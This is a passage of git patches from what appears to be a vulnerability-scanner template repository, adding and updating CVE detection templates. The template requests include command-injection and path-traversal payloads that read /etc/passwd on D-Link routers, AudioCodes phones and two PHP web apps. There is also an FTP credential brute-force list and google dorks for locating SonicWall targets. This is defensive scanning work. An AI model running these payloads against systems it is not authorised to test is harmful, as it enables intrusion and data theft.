| | | | | | | | | +| 74cms | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| cves2001 | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| bing | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | | discourse | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| instagram | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| key | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| cve202 | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| graph | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| weather | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| sendgrid | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 17c9c10e8a..e941b1bca2 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 828 | daffainfo | 288 | cves | 832 | info | 749 | http | 2205 | -| lfi | 340 | pikpikcu | 280 | vulnerabilities | 327 | high | 645 | file | 50 | -| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 269 | medium | 474 | network | 45 | +| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | +| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | +| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 140 | | | | | +| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | | rce | 212 | gy741 | 81 | takeovers | 65 | | | | | | tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | +| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 164 | madrobot | 63 | file | 50 | | | | | From 59fd3b88f714af295cd437a120902a218175456e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 18 Oct 2021 02:54:34 +0530 Subject: [PATCH 2987/4083] misc update --- network/ftp-weak-credentials.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/network/ftp-weak-credentials.yaml b/network/ftp-weak-credentials.yaml index 57eb4e53ac..ba537cbaa2 100644 --- a/network/ftp-weak-credentials.yaml +++ b/network/ftp-weak-credentials.yaml @@ -10,11 +10,12 @@ network: - inputs: - data: "USER {{username}}\r\nPASS {{password}}\r\n" + host: - "{{Hostname}}:21" - "{{Hostname}}" - stop-at-first-match: true + attack: clusterbomb payloads: username: - admin @@ -28,8 +29,6 @@ network: - pass1 - stingray - attack: clusterbomb - matchers: - type: word words: From 3d6a079b4237687ef71794802272f3893a33fc27 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 18 Oct 2021 03:14:23 +0530 Subject: [PATCH 2988/4083] workflow update --- .github/workflows/template-validate.yml | 4 ++-- workflows/rabbitmq-workflow.yaml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index e652333875..a158694063 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -23,11 +23,11 @@ jobs: env: GO111MODULE: on run: | - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@master + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev shell: bash - name: Template Validation run: | nuclei -validate -t . - # nuclei -validate -w ./workflows # Disabling temporarily + nuclei -validate -w ./workflows shell: bash \ No newline at end of file diff --git a/workflows/rabbitmq-workflow.yaml b/workflows/rabbitmq-workflow.yaml index c5fc2b4324..30c015ac40 100644 --- a/workflows/rabbitmq-workflow.yaml +++ b/workflows/rabbitmq-workflow.yaml @@ -9,4 +9,4 @@ workflows: - template: exposed-panels/rabbitmq-dashboard.yaml subtemplates: - - template: default-logins/rabbitmq/rabbitmq-default-admin.yaml \ No newline at end of file + - template: default-logins/rabbitmq/ \ No newline at end of file From c7fc202ef16f264d2214b8e948b6267fa60bf036 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 18 Oct 2021 08:24:29 +0900 Subject: [PATCH 2989/4083] Create CVE-2021-20031.yaml A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-20031.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-20031.yaml diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml new file mode 100644 index 0000000000..081be48518 --- /dev/null +++ b/cves/2021/CVE-2021-20031.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-20031 + +info: + name: Sonicwall SonicOS 7.0 - Host Header Injection + author: gy741 + severity: medium + description: | + A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 + - https://www.exploit-db.com/exploits/50414 + tags: cve,cve2021,sonicwall + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{randstr}}.tld + + matchers-condition: and + matchers: + - type: word + words: + - 'https://{{randstr}}.tld/auth.html' + - 'Please be patient as you are being re-directed' + part: body + condition: and + + - type: status + status: + - 200 From 98d8a15123ea72dcdab68e0700b28146985d8443 Mon Sep 17 00:00:00 2001 From: Wisnu Pramoedya <62658181+wisnupramoedya@users.noreply.github.com> Date: Mon, 18 Oct 2021 19:44:09 +0700 Subject: [PATCH 2990/4083] Create CVE-2018-10093.yaml --- cves/2018/CVE-2018-10093.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-10093.yaml diff --git a/cves/2018/CVE-2018-10093.yaml b/cves/2018/CVE-2018-10093.yaml new file mode 100644 index 0000000000..94e57900ac --- /dev/null +++ b/cves/2018/CVE-2018-10093.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-10093 + +info: + name: AudioCode 400HD - RCE + author: wisnupramoedya + severity: critical + description: AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow Remote Code Execution. + reference: + - https://www.exploit-db.com/exploits/46164 + - https://nvd.nist.gov/vuln/detail/CVE-2018-10093 + tags: cve,cve2018,rce,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/command.cgi?cat%20/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "admin:.*:" + + - type: status + status: + - 200 From 7d007d29f0ebb9fd91a4116b1776ffdbadce3f86 Mon Sep 17 00:00:00 2001 From: Wisnu Pramoedya <62658181+wisnupramoedya@users.noreply.github.com> Date: Mon, 18 Oct 2021 19:56:22 +0700 Subject: [PATCH 2991/4083] Create CVE-2018-10823.yaml --- cves/2018/CVE-2018-10823.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-10823.yaml diff --git a/cves/2018/CVE-2018-10823.yaml b/cves/2018/CVE-2018-10823.yaml new file mode 100644 index 0000000000..3bfb44909c --- /dev/null +++ b/cves/2018/CVE-2018-10823.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-10823 + +info: + name: D-Link Routers - Command Injection + author: wisnupramoedya + severity: high + description: An issue was discovered on D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. + reference: + - https://www.exploit-db.com/exploits/45676 + - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 + tags: cve,cve2018,rce,iot,dlink + +requests: + - method: GET + path: + - "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 89f9d65d7d6337e44dea272d3a2d8e603f70cda4 Mon Sep 17 00:00:00 2001 From: Wisnu Pramoedya <62658181+wisnupramoedya@users.noreply.github.com> Date: Mon, 18 Oct 2021 20:00:57 +0700 Subject: [PATCH 2992/4083] Create CVE-2018-13980.yaml --- cves/2018/CVE-2018-13980.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-13980.yaml diff --git a/cves/2018/CVE-2018-13980.yaml b/cves/2018/CVE-2018-13980.yaml new file mode 100644 index 0000000000..ce92e39900 --- /dev/null +++ b/cves/2018/CVE-2018-13980.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-13980 + +info: + name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure + author: wisnupramoedya + severity: high + description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. + reference: + - https://www.exploit-db.com/exploits/45016 + - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From cf1b818d5b8b6a34532f1009ed9fbc05bf21e348 Mon Sep 17 00:00:00 2001 From: Wisnu Pramoedya <62658181+wisnupramoedya@users.noreply.github.com> Date: Mon, 18 Oct 2021 20:04:38 +0700 Subject: [PATCH 2993/4083] Create CVE-2018-12054.yaml --- cves/2018/CVE-2018-12054.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-12054.yaml diff --git a/cves/2018/CVE-2018-12054.yaml b/cves/2018/CVE-2018-12054.yaml new file mode 100644 index 0000000000..1db786a56f --- /dev/null +++ b/cves/2018/CVE-2018-12054.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-12054 + +info: + name: Schools Alert Management Script - Arbitrary File Read + author: wisnupramoedya + severity: high + description: Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal. + reference: + - https://www.exploit-db.com/exploits/44874 + - https://www.cvedetails.com/cve/CVE-2018-12054 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/img.php?f=/./etc/./passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 79656346cdbaad2b1e4cbac7c44ff2ac519a9660 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 15:14:58 +0000 Subject: [PATCH 2994/4083] Auto Generated CVE annotations [Mon Oct 18 15:14:58 UTC 2021] :robot: --- cves/2018/CVE-2018-12054.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2018/CVE-2018-12054.yaml b/cves/2018/CVE-2018-12054.yaml index 1db786a56f..7daf35a964 100644 --- a/cves/2018/CVE-2018-12054.yaml +++ b/cves/2018/CVE-2018-12054.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/44874 - https://www.cvedetails.com/cve/CVE-2018-12054 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-12054 + cwe-id: CWE-22 requests: - method: GET From 868264f8395e25528acbe7f80a6d31b5b9957453 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Oct 2021 20:46:01 +0530 Subject: [PATCH 2995/4083] Update CVE-2018-10823.yaml --- cves/2018/CVE-2018-10823.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-10823.yaml b/cves/2018/CVE-2018-10823.yaml index 3bfb44909c..550c39395d 100644 --- a/cves/2018/CVE-2018-10823.yaml +++ b/cves/2018/CVE-2018-10823.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/45676 - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 - tags: cve,cve2018,rce,iot,dlink + tags: cve,cve2018,rce,iot,dlink,router requests: - method: GET From 0762d645fb39231ffc362d06f3db447e9fbb3a0c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 15:16:57 +0000 Subject: [PATCH 2996/4083] Auto Generated CVE annotations [Mon Oct 18 15:16:57 UTC 2021] :robot: --- cves/2018/CVE-2018-13980.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-13980.yaml b/cves/2018/CVE-2018-13980.yaml index ce92e39900..3f6afd77f7 100644 --- a/cves/2018/CVE-2018-13980.yaml +++ b/cves/2018/CVE-2018-13980.yaml @@ -3,12 +3,17 @@ id: CVE-2018-13980 info: name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure author: wisnupramoedya - severity: high + severity: medium description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. reference: - https://www.exploit-db.com/exploits/45016 - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.50 + cve-id: CVE-2018-13980 + cwe-id: CWE-22 requests: - method: GET From d2d4d01846f7462dceaf508557f1ee5a06ac650c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 15:19:41 +0000 Subject: [PATCH 2997/4083] Auto Generated CVE annotations [Mon Oct 18 15:19:41 UTC 2021] :robot: --- cves/2018/CVE-2018-10093.yaml | 7 ++++++- cves/2018/CVE-2018-10823.yaml | 5 +++++ 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-10093.yaml b/cves/2018/CVE-2018-10093.yaml index 94e57900ac..bdb9d75bc5 100644 --- a/cves/2018/CVE-2018-10093.yaml +++ b/cves/2018/CVE-2018-10093.yaml @@ -3,12 +3,17 @@ id: CVE-2018-10093 info: name: AudioCode 400HD - RCE author: wisnupramoedya - severity: critical + severity: high description: AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow Remote Code Execution. reference: - https://www.exploit-db.com/exploits/46164 - https://nvd.nist.gov/vuln/detail/CVE-2018-10093 tags: cve,cve2018,rce,iot + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-10093 + cwe-id: CWE-862 requests: - method: GET diff --git a/cves/2018/CVE-2018-10823.yaml b/cves/2018/CVE-2018-10823.yaml index 550c39395d..81ca5b0d08 100644 --- a/cves/2018/CVE-2018-10823.yaml +++ b/cves/2018/CVE-2018-10823.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/45676 - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 tags: cve,cve2018,rce,iot,dlink,router + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-10823 + cwe-id: CWE-78 requests: - method: GET From 6346c6e93a063a4115039457d68bcadef773c6ae Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Oct 2021 20:52:36 +0530 Subject: [PATCH 2998/4083] Update CVE-2021-20031.yaml --- cves/2021/CVE-2021-20031.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml index 081be48518..e54a086b78 100644 --- a/cves/2021/CVE-2021-20031.yaml +++ b/cves/2021/CVE-2021-20031.yaml @@ -3,13 +3,15 @@ id: CVE-2021-20031 info: name: Sonicwall SonicOS 7.0 - Host Header Injection author: gy741 - severity: medium - description: | - A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack + severity: low + description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 - https://www.exploit-db.com/exploits/50414 - tags: cve,cve2021,sonicwall + - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 + metadata: + google-dork: inurl:"auth.html" intitle:"SonicWall" + google-dork: intitle:"SonicWall Analyzer Login" + tags: cve,cve2021,sonicwall,redirect requests: - raw: From 9e37e202bdf3d2820814c096ebb9b52124e7fa80 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Oct 2021 20:55:47 +0530 Subject: [PATCH 2999/4083] Update CVE-2021-20031.yaml --- cves/2021/CVE-2021-20031.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml index e54a086b78..97ff54f001 100644 --- a/cves/2021/CVE-2021-20031.yaml +++ b/cves/2021/CVE-2021-20031.yaml @@ -9,8 +9,7 @@ info: - https://www.exploit-db.com/exploits/50414 - https://nvd.nist.gov/vuln/detail/CVE-2021-20031 metadata: - google-dork: inurl:"auth.html" intitle:"SonicWall" - google-dork: intitle:"SonicWall Analyzer Login" + google-dork: 